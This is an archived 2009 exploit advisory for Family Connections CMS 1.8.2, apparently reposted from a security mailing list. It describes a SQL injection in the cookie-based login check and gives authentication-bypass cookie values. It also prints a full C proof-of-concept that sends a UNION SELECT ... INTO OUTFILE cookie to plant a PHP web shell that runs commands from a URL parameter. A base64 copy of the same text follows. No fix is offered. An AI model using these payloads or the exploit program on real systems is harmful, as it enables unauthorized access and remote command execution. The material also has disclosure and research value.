AOH :: HP Unsorted F :: VA3066.HTM

Family Connections 1.8.2 Blind SQL Injection (Correct Version)



Family Connections 1.8.2 Blind SQL Injection (Correct Version)
Family Connections 1.8.2 Blind SQL Injection (Correct Version)



--001636c5ac7a9626230466a69dcc
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 1 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Blind SQL Injection

[-] File affected: inc/util_inc.php

Usually an SQL injection vulnerability located in the
authentication system allows a guest to bypass it, and
this is just what happens using the following cookie:

Cookie name: fcms_login_id
Cookie content: -1 UNION ALL SELECT
1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
Cookie server: localhost (change it)
Cookie path: /

Cookie name: fcms_login_uname
Cookie content: admin
Cookie server: localhost (change it)
Cookie path: /

Cookie name: fcms_login_pw
Cookie content: password
Cookie server: localhost (change it)
Cookie path: /

Anyway the values contained in the previous cookies
are used also by other functions and queries and so
is not possible to surf on the vulnerable website
with such permissions because the CMS interrupts the
sessions each time a SQL error is encountered.
For this reason the possibility to write the result
of the SQL queries on the files is handy to bypass
this limitation.

The follows is the vulnerable code:

...

elseif (isset($_COOKIE['fcms_login_id'])) {
	if (isLoggedIn($_COOKIE['fcms_login_id'],
$_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
		$_SESSION['login_id'] = $_COOKIE['fcms_login_id'];
		$_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
		$_SESSION['login_pw'] = $_COOKIE['fcms_login_pw'];
	}
	
...

in util_inc.php:

function isLoggedIn ($userid, $username, $password) {
	$result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` $userid LIMIT 1") or die('

Login Error (util.inc.php 275)

' . mysql_error()); if (mysql_num_rows($result) > 0) { $r = mysql_fetch_array($result); if ($r['username'] !== $username) { return false; } elseif ($r['password'] !== $password) { return false; } else { return true; } } else { return false; } } ************************************************* [+] Code - [A] Blind SQL Injection /* Family Connection <= 1.8.2 - Remote Command Execution Proof of Concept - Written by Salvatore "drosophila" Fresta The following software will create a file (rce.php) in the specified path using Blind SQL Injection bug. To exec remote commands, you must open the file using a browser. */ #include #include #include #include #include #include #include #include int socket_connect(char *server, int port) { int fd; struct sockaddr_in sock; struct hostent *host; memset(&sock, 0, sizeof(sock)); if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1; sock.sin_family = AF_INET; sock.sin_port = htons(port); if(!(host=gethostbyname(server))) return -1; sock.sin_addr = *((struct in_addr *)host->h_addr); if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1; return fd; } int socket_send(int socket, char *buffer, size_t size) { if(socket < 0) return -1; return write(socket, buffer, size) < 0 ? -1 : 0; } void usage(char *bn) { printf("\n\nFamily Connection <= 1.8.2 - Remote Command Execution\n" "Proof of Concept - Written by Salvatore \"drosophila\" Fresta\n\n" "usage: %s \n" "example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n", bn, bn); } int main(int argc, char *argv[]) { int sd; char code[] = "'\"%3b system($_GET[cmd])%3b echo \"


\"%3b?>'", *buffer; if(argc < 4) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(216+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]), sizeof(char)))) { perror("calloc"); return -1; } sprintf(buffer, "GET %shome.php HTTP/1.1\r\n" "Host: %s\r\n" "Cookie: fcms_login_id=-1 UNION ALL SELECT %s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '%srce.php'#\r\n\r\n", argv[2], argv[1], code, argv[3]); printf("\n[*] Connecting..."); if((sd = socket_connect(argv[1], 80)) < 0) { perror("[-] Connection failed"); free(buffer); return -1; } printf("\n[+] Connected" "\n[*] Sending..."); if(socket_send(sd, buffer, strlen(buffer)) < 0) { perror("[-] Sending failed"); free(buffer); return -1; } printf("\n[+] Sent\n\n" "Open your browser and try to connect to http://%s%srce.php?cmd=ls\n\n", argv[1], argv[2]); recv(sd, buffer, 1, 0); close(sd); free(buffer); printf("[+] Connection closed\n\n"); return 0; } ************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --001636c5ac7a9626230466a69dcc Content-Type: text/plain; charset=US-ASCII; name="Family Connections <= 1.8.2 Blind SQL Injection-01042009.txt" Content-Disposition: attachment; filename="Family Connections <= 1.8.2 Blind SQL Injection-01042009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_ft2x3uju0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBGYW1pbHkgQ29ubmVjdGlvbgpbK10gVmVyc2lvbjogPD0gMS44LjIKWytdIFdl YnNpdGU6IGh0dHA6Ly93d3cuZmFtaWx5Y21zLmNvbQoKWytdIEJ1Z3M6IFtBXSBCbGluZCBTUUwg SW5qZWN0aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEgQXByIDIwMDkK ClsrXSBEaXNjb3ZlcmVkIGJ5OiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQXV0 aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQ29udGFjdDogZS1tYWlsOiBk cm9zb3BoaWxheHh4QGdtYWlsLmNvbQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioKClsrXSBNZW51CgoxKSBCdWdzCjIpIENvZGUKMykgRml4CgoKKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIEJ1Z3MK CgotIFtBXSBCbGluZCBTUUwgSW5qZWN0aW9uCgpbLV0gRmlsZSBhZmZlY3RlZDogaW5jL3V0aWxf aW5jLnBocAoKVXN1YWxseSBhbiBTUUwgaW5qZWN0aW9uIHZ1bG5lcmFiaWxpdHkgbG9jYXRlZCBp biB0aGUNYXV0aGVudGljYXRpb24gc3lzdGVtIGFsbG93cyBhIGd1ZXN0IHRvIGJ5cGFzcyBpdCwg YW5kDXRoaXMgaXMganVzdCB3aGF0IGhhcHBlbnMgdXNpbmcgdGhlIGZvbGxvd2luZyBjb29raWU6 CgpDb29raWUgbmFtZTogZmNtc19sb2dpbl9pZApDb29raWUgY29udGVudDogLTEgVU5JT04gQUxM IFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOSwnYWRtaW4nLCdwYXNzd29yZCcsMTIsMTMsMTQsMTUs MTYsMTcsMTgsMTksMjAsMjEsMjIKQ29va2llIHNlcnZlcjogbG9jYWxob3N0IChjaGFuZ2UgaXQp CkNvb2tpZSBwYXRoOiAvCgpDb29raWUgbmFtZTogZmNtc19sb2dpbl91bmFtZQpDb29raWUgY29u dGVudDogYWRtaW4KQ29va2llIHNlcnZlcjogbG9jYWxob3N0IChjaGFuZ2UgaXQpCkNvb2tpZSBw YXRoOiAvCgpDb29raWUgbmFtZTogZmNtc19sb2dpbl9wdwpDb29raWUgY29udGVudDogcGFzc3dv cmQKQ29va2llIHNlcnZlcjogbG9jYWxob3N0IChjaGFuZ2UgaXQpCkNvb2tpZSBwYXRoOiAvCgpB bnl3YXkgdGhlIHZhbHVlcyBjb250YWluZWQgaW4gdGhlIHByZXZpb3VzIGNvb2tpZXMgCmFyZSB1 c2VkIGFsc28gYnkgb3RoZXIgZnVuY3Rpb25zIGFuZCBxdWVyaWVzIGFuZCBzbyAKaXMgbm90IHBv c3NpYmxlIHRvIHN1cmYgb24gdGhlIHZ1bG5lcmFibGUgd2Vic2l0ZSAKd2l0aCBzdWNoIHBlcm1p c3Npb25zIGJlY2F1c2UgdGhlIENNUyBpbnRlcnJ1cHRzIHRoZSAKc2Vzc2lvbnMgZWFjaCB0aW1l IGEgU1FMIGVycm9yIGlzIGVuY291bnRlcmVkLg1Gb3IgdGhpcyByZWFzb24gdGhlIHBvc3NpYmls aXR5IHRvIHdyaXRlIHRoZSByZXN1bHQgCm9mIHRoZSBTUUwgcXVlcmllcyBvbiB0aGUgZmlsZXMg aXMgaGFuZHkgdG8gYnlwYXNzIAp0aGlzIGxpbWl0YXRpb24uCgpUaGUgZm9sbG93cyBpcyB0aGUg dnVsbmVyYWJsZSBjb2RlOgoKLi4uCgplbHNlaWYgKGlzc2V0KCRfQ09PS0lFWydmY21zX2xvZ2lu X2lkJ10pKSB7DQlpZiAoaXNMb2dnZWRJbigkX0NPT0tJRVsnZmNtc19sb2dpbl9pZCddLCAkX0NP T0tJRVsnZmNtc19sb2dpbl91bmFtZSddLCAkX0NPT0tJRVsnZmNtc19sb2dpbl9wdyddKSkgew0J CSRfU0VTU0lPTlsnbG9naW5faWQnXSA9ICRfQ09PS0lFWydmY21zX2xvZ2luX2lkJ107DQkJJF9T RVNTSU9OWydsb2dpbl91bmFtZSddID0gJF9DT09LSUVbJ2ZjbXNfbG9naW5fdW5hbWUnXTsNCQkk X1NFU1NJT05bJ2xvZ2luX3B3J10gPSAkX0NPT0tJRVsnZmNtc19sb2dpbl9wdyddOw0JfQoJCi4u LgoKaW4gdXRpbF9pbmMucGhwOgoKZnVuY3Rpb24gaXNMb2dnZWRJbiAoJHVzZXJpZCwgJHVzZXJu YW1lLCAkcGFzc3dvcmQpIHsNCSRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSBg ZmNtc191c2Vyc2AgV0hFUkUgYGlkYCA9ICR1c2VyaWQgTElNSVQgMSIpIG9yIGRpZSgnPGgxPkxv Z2luIEVycm9yICh1dGlsLmluYy5waHAgMjc1KTwvaDE+JyAuIG15c3FsX2Vycm9yKCkpOw0JaWYg KG15c3FsX251bV9yb3dzKCRyZXN1bHQpID4gMCkgew0JCSRyID0gbXlzcWxfZmV0Y2hfYXJyYXko JHJlc3VsdCk7DQkJaWYgKCRyWyd1c2VybmFtZSddICE9PSAkdXNlcm5hbWUpIHsgcmV0dXJuIGZh bHNlOyB9IGVsc2VpZiAoJHJbJ3Bhc3N3b3JkJ10gIT09ICRwYXNzd29yZCkgeyByZXR1cm4gZmFs c2U7IH0gZWxzZSB7IHJldHVybiB0cnVlOyB9DQl9IGVsc2Ugew0JCXJldHVybiBmYWxzZTsNCX0N fQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsr XSBDb2RlCgoKLSBbQV0gQmxpbmQgU1FMIEluamVjdGlvbgoKLyoKCglGYW1pbHkgQ29ubmVjdGlv biA8PSAxLjguMiAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbgoJCglQcm9vZiBvZiBDb25jZXB0 IC0gV3JpdHRlbiBieSBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQoKCVRoZSBmb2xsb3dp bmcgc29mdHdhcmUgd2lsbCBjcmVhdGUgYSBmaWxlIChyY2UucGhwKSBpbiB0aGUKCXNwZWNpZmll ZCBwYXRoIHVzaW5nIEJsaW5kIFNRTCBJbmplY3Rpb24gYnVnLiBUbyBleGVjIHJlbW90ZQoJY29t bWFuZHMsIHlvdSBtdXN0IG9wZW4gdGhlIGZpbGUgdXNpbmcgYSBicm93c2VyLgoJCiovCQoKI2lu Y2x1ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdGRpby5oPgoj aW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxu ZXRpbmV0L2luLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CgppbnQg c29ja2V0X2Nvbm5lY3QoY2hhciAqc2VydmVyLCBpbnQgcG9ydCkgewoKCWludCBmZDsKCXN0cnVj dCBzb2NrYWRkcl9pbiBzb2NrOwoJc3RydWN0IGhvc3RlbnQgKmhvc3Q7CgkKCW1lbXNldCgmc29j aywgMCwgc2l6ZW9mKHNvY2spKTsKCQoJaWYoKGZkID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RS RUFNLCAwKSkgPCAwKSByZXR1cm4gLTE7CgkKCXNvY2suc2luX2ZhbWlseSA9IEFGX0lORVQ7Cglz b2NrLnNpbl9wb3J0ID0gaHRvbnMocG9ydCk7CgkKCWlmKCEoaG9zdD1nZXRob3N0YnluYW1lKHNl cnZlcikpKSByZXR1cm4gLTE7CgkKCXNvY2suc2luX2FkZHIgPSAqKChzdHJ1Y3QgaW5fYWRkciAq KWhvc3QtPmhfYWRkcik7CgkKCWlmKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNv Y2ssIHNpemVvZihzb2NrKSkgPCAwKSByZXR1cm4gLTE7CgkKCXJldHVybiBmZDsKICAgCn0KCmlu dCBzb2NrZXRfc2VuZChpbnQgc29ja2V0LCBjaGFyICpidWZmZXIsIHNpemVfdCBzaXplKSB7CgkK CWlmKHNvY2tldCA8IDApIHJldHVybiAtMTsKCglyZXR1cm4gd3JpdGUoc29ja2V0LCBidWZmZXIs IHNpemUpIDwgMCA/IC0xIDogMDsKCQp9Cgp2b2lkIHVzYWdlKGNoYXIgKmJuKSB7CgoJcHJpbnRm KCJcblxuRmFtaWx5IENvbm5lY3Rpb24gPD0gMS44LjIgLSBSZW1vdGUgQ29tbWFuZCBFeGVjdXRp b25cbiIKCQkJIlByb29mIG9mIENvbmNlcHQgLSBXcml0dGVuIGJ5IFNhbHZhdG9yZSBcImRyb3Nv cGhpbGFcIiBGcmVzdGFcblxuIgoJCQkidXNhZ2U6ICVzIDxzZXJ2ZXI+IDxwYXRoPiA8ZnMgcGF0 aD5cbiIKCQkJImV4YW1wbGU6ICVzIGxvY2FsaG9zdCAvZmNtcy8gL3Zhci93d3cvaHRkb2NzL2Zj bXMvXG5cbiIsIGJuLCBibik7CQoKfQoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkg ewoJCglpbnQgc2Q7CgljaGFyIGNvZGVbXSA9ICInPD9waHAgZWNobyBcIjxwcmU+XCIlM2Igc3lz dGVtKCRfR0VUW2NtZF0pJTNiIGVjaG8gXCI8L3ByZT48YnI+PGJyPlwiJTNiPz4nIiwKCQkqYnVm ZmVyOyAKCQoJaWYoYXJnYyA8IDQpIHsKCQl1c2FnZShhcmd2WzBdKTsKCQlyZXR1cm4gLTE7Cgl9 CgkKCWlmKCEoYnVmZmVyID0gKGNoYXIgKiljYWxsb2MoMjE2K3N0cmxlbihhcmd2WzFdKStzdHJs ZW4oYXJndlsyXSkrc3RybGVuKGFyZ3ZbM10pLCBzaXplb2YoY2hhcikpKSkgewoJCXBlcnJvcigi Y2FsbG9jIik7CgkJcmV0dXJuIC0xOwoJfQoJCglzcHJpbnRmKGJ1ZmZlciwJIkdFVCAlc2hvbWUu cGhwIEhUVFAvMS4xXHJcbiIKCQkJCQkiSG9zdDogJXNcclxuIgoJCQkJCSJDb29raWU6IGZjbXNf bG9naW5faWQ9LTEgVU5JT04gQUxMIFNFTEVDVCAlcywwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCww LDAsMCwwLDAsMCwwLDAsMCBJTlRPIE9VVEZJTEUgJyVzcmNlLnBocCcjXHJcblxyXG4iLAoJCQkJ CWFyZ3ZbMl0sIGFyZ3ZbMV0sIGNvZGUsIGFyZ3ZbM10pOwoJCQkJCQoJcHJpbnRmKCJcblsqXSBD b25uZWN0aW5nLi4uIik7CgkKCWlmKChzZCA9IHNvY2tldF9jb25uZWN0KGFyZ3ZbMV0sIDgwKSkg PCAwKSB7CgkJcGVycm9yKCJbLV0gQ29ubmVjdGlvbiBmYWlsZWQiKTsKCQlmcmVlKGJ1ZmZlcik7 CgkJcmV0dXJuIC0xOwoJfQoJCglwcmludGYoIlxuWytdIENvbm5lY3RlZCIKCQkJIlxuWypdIFNl bmRpbmcuLi4iKTsKCQoJaWYoc29ja2V0X3NlbmQoc2QsIGJ1ZmZlciwgc3RybGVuKGJ1ZmZlcikp IDwgMCkgewoJCXBlcnJvcigiWy1dIFNlbmRpbmcgZmFpbGVkIik7CgkJZnJlZShidWZmZXIpOwoJ CXJldHVybiAtMTsKCX0KCQoJcHJpbnRmKCJcblsrXSBTZW50XG5cbiIKCQkJIk9wZW4geW91ciBi cm93c2VyIGFuZCAgdHJ5IHRvIGNvbm5lY3QgdG8gaHR0cDovLyVzJXNyY2UucGhwP2NtZD1sc1xu XG4iLCBhcmd2WzFdLCBhcmd2WzJdKTsKCQkJCglyZWN2KHNkLCBidWZmZXIsIDEsIDApOwoJCglj bG9zZShzZCk7CglmcmVlKGJ1ZmZlcik7CgkKCXByaW50ZigiWytdIENvbm5lY3Rpb24gY2xvc2Vk XG5cbiIpOwoJCglyZXR1cm4gMDsKCQp9CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001636c5ac7a9626230466a69dcc--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.